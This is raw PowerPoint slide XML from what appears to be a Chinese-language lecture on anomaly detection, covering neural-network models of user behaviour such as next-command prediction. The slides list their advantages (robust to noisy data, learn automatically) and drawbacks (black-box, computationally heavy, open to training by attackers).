          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="219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计算量巨大</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="82" name="组合 81">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1EF7D4-487F-2258-0271-7A7ED08487E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="83" name="图片 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{816E1D9C-F724-CD0A-205F-C5E66028D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4" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C35AB0F-CDB9-AD20-A6D0-D80F6F8A4A0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85" name="组合 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76F6A5C-1557-6C90-95AB-1DFFD5E3C027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="5121472"/>
            <a:ext cx="2766060" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="4356" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{700ED1A9-19EB-746E-9F37-246B2FDB6AD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="341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可能被攻击者训练</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87" name="组合 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16BD625E-6C15-D260-4E4D-6C5E1D293286}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="88" name="图片 87">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0DE6C47-60C4-038C-3F92-C6942C614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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815A4F9F-6E44-FCB6-AD0D-D9347483B21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90" name="组合 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFF2DFE-7065-CE2C-955E-F8F913E38A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="5618710"/>
            <a:ext cx="3891280" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6128" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A06E734C-556C-58E3-3FE9-5273968BB44C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="5183"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对事件发生的顺序不敏感</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="92" name="组合 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D3D8FE-C7EC-6EEE-6365-E36C1E813657}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="93" name="图片 92">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{128A263E-93B9-E94A-42CE-293C1D9D52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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA9B8923-7A12-1D3F-0A38-6DB4F68CFF25}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="图片 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0A70E2-D5C5-06CC-CD5F-7D2059120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06" y="3939118"/>
            <a:ext cx="2757857" cy="1840007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F21B145E-AA5E-4AB9-9238-F4853D8A4C4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212286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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B050302020402020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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B050302020402020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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>神经网络异常检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD177DF3-21B0-FC7B-614C-E8C43250A66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="2091020"/>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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>将神经网络用于对系统或用户行为的学习</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRP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1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="组合 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C768B8E-AED4-C59F-CB67-45E0ED8F57DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="2686203"/>
            <a:ext cx="9460230" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="14898" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FFEE54-351A-D541-1D88-AE6C307B93AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="1366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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>根据用户已执行命令预测用户的下一条命令</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="组合 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD9BDD0-5946-5F6B-B812-F57888F8AE7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>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2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="组合 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8193AB5-AAA7-2E49-D219-89DCB1C59259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="3934870"/>
            <a:ext cx="1118136" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F129DA55-343D-FB6C-412B-530340E232EA}"/>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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B018D4-38F1-C2AB-5480-E8F1FB1EA04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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C118A14-C7D1-D6DA-A131-82C5F09D9E88}"/>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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>优势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB7C10B-5512-1782-23A0-12389C62AAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="964303" y="4771825"/>
            <a:ext cx="4315460" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6796" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A1DA32-CCE4-7E71-E6F6-517AF929644E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="585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rPr>
                <a:t>能处理原始数据的随机性和干扰性</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55" name="组合 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F23CB99-EB51-45B7-4C7E-BDB3C49C6307}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="62" name="图片 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AE3172-1850-A34F-D6B7-89946902A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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE33040D-90DB-DB01-4B82-5FB1815CC9F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1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{675CE9CC-F70B-161D-9384-837EC96BE4DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="962061" y="5314183"/>
            <a:ext cx="2868295" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="4517" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFEC2020-4C0F-23FD-944E-60B69A3B4897}"/>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rPr>
                <a:t>能够自动学习</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="71" name="组合 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73DDA9F6-4008-2762-7261-7718193F8A9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="72" name="图片 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F383D49-1BFF-5DAB-C9A9-6026E61A85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3" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3386BD-4CE9-789D-EA24-AE5CE37799B5}"/>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2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="74" name="组合 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620B6FDF-4485-445A-A202-BEF0C9DBA629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5286880" y="3920674"/>
            <a:ext cx="1118136" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C08E8DC-C083-DA71-48E1-ADCB805ED79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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D280F5FF-01EB-D098-DBD2-DE53849B8DC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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7006A067-0F1D-0C2E-6D33-F47951D18B86}"/>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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>不足</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="80" name="组合 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED5CF8-5175-8748-80E4-1109A548CD66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="4644079"/>
            <a:ext cx="2214245" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="3487" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4827B280-32A3-D217-04D0-5CF9E1594970}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="254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rPr>
                <a:t>“黑盒”建模</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="82" name="组合 81">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1EF7D4-487F-2258-0271-7A7ED08487E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="83" name="图片 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{816E1D9C-F724-CD0A-205F-C5E66028D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4" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C35AB0F-CDB9-AD20-A6D0-D80F6F8A4A0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1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="85" name="组合 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76F6A5C-1557-6C90-95AB-1DFFD5E3C027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="5121472"/>
            <a:ext cx="3283585" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="5171" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
